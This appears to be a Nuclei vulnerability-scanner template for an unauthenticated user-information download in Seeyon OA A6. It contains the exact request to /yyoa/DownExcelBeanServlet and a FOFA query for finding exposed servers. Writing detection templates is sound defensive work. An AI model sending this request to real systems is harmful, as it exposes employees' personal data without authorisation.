id: seeyon-a6-downexcelbeanservlet-disclosure

info:
  name: 致远 OA A6 DownExcelBeanServlet - disclosure
  author: pikpikcu
  severity: medium  
  description: 致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息
  reference:
    - todo
  metadata:
    verified: false
    fofa-qeury: body="yyoa" && app="致远互联-OA"
  tags: seeyon,oa,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "attachment"
          - "application/x-msdownload"
        part: header
        condition: and

      - type: status
        status:
          - 200

          
# 需登录,任意用户访问，可下载所有员工的个人信息
